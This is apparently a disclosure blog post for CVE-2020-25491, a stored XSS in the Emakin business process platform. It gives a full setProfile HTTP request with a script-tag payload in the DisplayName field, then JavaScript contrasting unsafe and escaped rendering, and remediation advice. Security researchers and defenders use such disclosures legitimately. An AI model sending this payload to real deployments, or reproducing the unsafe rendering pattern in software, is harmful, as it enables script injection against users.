CVE-2020-25491
6Kare Emakin 5.0.341.0 is affected by Cross Site Scripting (XSS) via the /rpc/membership/setProfile DisplayName field, which is mishandled when rendering the Activity Stream page.
What is Emakin?
Emakin is a business process platform marketed to companies under the headings of process improvement, teamwork, mobility, compatibility, safety and security, reduced costs, higher revenue and a single platform.
Companies using Emakin include VakıfBank, Ülker, Katılım Emeklilik, Sabancı, Aegon, Eczacıbaşı, Godiva, Tarsim, A101, Near East Bank and various other institutions.
Based on the companies using Emakin, we can say that the software is used extensively in Turkey.
What is CVE-2020-25491?
CVE-2020-25491 is a basic stored XSS, and the vulnerability is simple to reproduce.
The "Display Name" field in the profile editing area (https://vulnerable.com/app/#/profile), reached from the top menu, is the field affected by this vulnerability.
Request:
POST /rpc/membership/setProfile HTTP/1.1
Host: vulnerable.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 807
Origin: https://vulnerable.com
Connection: close
Referer: https://vulnerable.com/app/
Cookie: _fbp=fb.2.1598889391208.495488426; cultPref=en-US; cookieToken=D5D4DB9DB3DAD8D77D8C522DCF252136F15DAA85C5F217D42F34EAB79E6F30D346CE7128F84A53911E9E81B947E4ED4D2384F649CDCE2ED20FC53ED1E6CAC816977884D841DD7EAAA9C378E9CB37F51103E7A42B; AKOpenAuth=C52389963AF70A290721BC7C7B4BE9F062152850C92C5C9B48AB80ED00EFCCF074D63D56C2C340EC61802827BEAFF995; .ASPXAUTH=5F48AA8100055D6A13A71418D07796D507B770DA1FD64EC7BBBF367E464FD06A585C11D72EB6383F6E05465862E7025FA37498078450FB797AC4E2EC0DDA1BC99FB0E76B389F78F64F3DA853290CFE4D124E9BAE40F0F231C1C61756483B5A0E7645D713181693BBF1927933791D5D0EBAF52FE1A30A1829E6B7DF795152E333F85719315F606AE9383EF427CC842F1D4B15D12D178108E332CE7387AC74EE932B0300853BF62B000BC321A49B28CDD983D70DABFB45E1565DAD7068FC6C4CD201EE40171A31694C554F0470206EEC1DA1A505D0

{"profile":"<UserProfile><Properties><Name/><Surname/><DisplayName><script>alert('1337')</script></DisplayName><EMailAddress>[email protected]</EMailAddress><Language Caption=\"English (American Samoa)\">en-AS</Language><DateFormat Caption=\"Auto Format\"/><Theme Caption=\"Default\"/></Properties><DomainTheme>Blocks</DomainTheme><Themes><Theme>Blocks</Theme><Theme>Blue</Theme><Theme>Clean</Theme><Theme>Sun</Theme></Themes><Ticket>E52FEF99EB0C4A5FED7AE7AF917040A732C0C69182F331CBC4D0F3F0689246AB1E61492A11C75F61E0989CA9B09E553E7FBA7E7F850D9F872E5FE3BCAFC38359C3E01C53D8E83D2FABE270455C200866182ADDBA</Ticket><Logons><Logon><Provider>Organization</Provider></Logon><Logon><Provider>LDAP</Provider></Logon></Logons><ImageFile Caption=\"\" Url=\"\"/><ImageUrl/></UserProfile>"}
You can see the payload is: <script>alert('1337')</script>
The stored DisplayName is later rendered without encoding, so the payload executes on the Activity Stream (https://vulnerable.com/app/#/activitystream) and Work Item (https://vulnerable.com/app/#/workitem/WorkItemId) pages.
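The root cause described above is a stored DisplayName that reaches the Activity Stream markup without output encoding. The following is an added example, not Emakin's code, showing the pattern side by side: an unsafe renderer that interpolates the stored name straight into HTML, a safe one that HTML-encodes every untrusted field at the point it enters markup, and a server-side allow-list check on setProfile as defence in depth. The entry object, field names and the regular expression are assumptions constructed for the example.

```javascript
// Added example (not Emakin's code). Shows why encoding at render time fixes
// the stored XSS, with an input allow-list as a second layer.

// Constructed activity entry mirroring the DisplayName payload from the advisory.
const SAMPLE_ENTRY = {
  displayName: "<script>alert('1337')</script>",
  action: "updated a work item",
};

// HTML-encode the five characters that change meaning in element content
// and in double- or single-quoted attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Unsafe: the stored name is spliced into markup as-is, which is the
// behaviour the advisory describes for the Activity Stream page.
function renderActivityItemUnsafe(entry) {
  return `<li class="activity"><b>${entry.displayName}</b> ${entry.action}</li>`;
}

// Safe: every field that originated from user input is encoded here,
// regardless of whether it was validated when it was stored.
function renderActivityItemSafe(entry) {
  return `<li class="activity"><b>${escapeHtml(entry.displayName)}</b> ${escapeHtml(entry.action)}</li>`;
}

// Defence in depth for the setProfile handler: a display name should look
// like a name. Unicode letters, marks and digits plus a few punctuation
// characters are allowed; angle brackets, quotes and ampersands are not.
// (Assumed policy; length limit and character set are example choices.)
const DISPLAY_NAME_RE = /^[\p{L}\p{M}\p{N} .,'-]{1,64}$/u;

function isAcceptableDisplayName(name) {
  return typeof name === "string" && DISPLAY_NAME_RE.test(name);
}

// Stand-alone demonstration of the contrast.
console.log("unsafe:", renderActivityItemUnsafe(SAMPLE_ENTRY));
console.log("safe:  ", renderActivityItemSafe(SAMPLE_ENTRY));
console.log("accept 'Ayşe Yılmaz':", isAcceptableDisplayName("Ayşe Yılmaz"));
console.log("accept payload:", isAcceptableDisplayName(SAMPLE_ENTRY.displayName));
```

Output encoding is the fix that closes the vulnerability: it works even for names that were stored before the input check existed, and it covers every page that renders the field, including the Work Item page mentioned above. The allow-list only narrows what a future setProfile request can store and should not be relied on alone.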
For more details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-25491
For more blogposts: https://ayberk.ninja/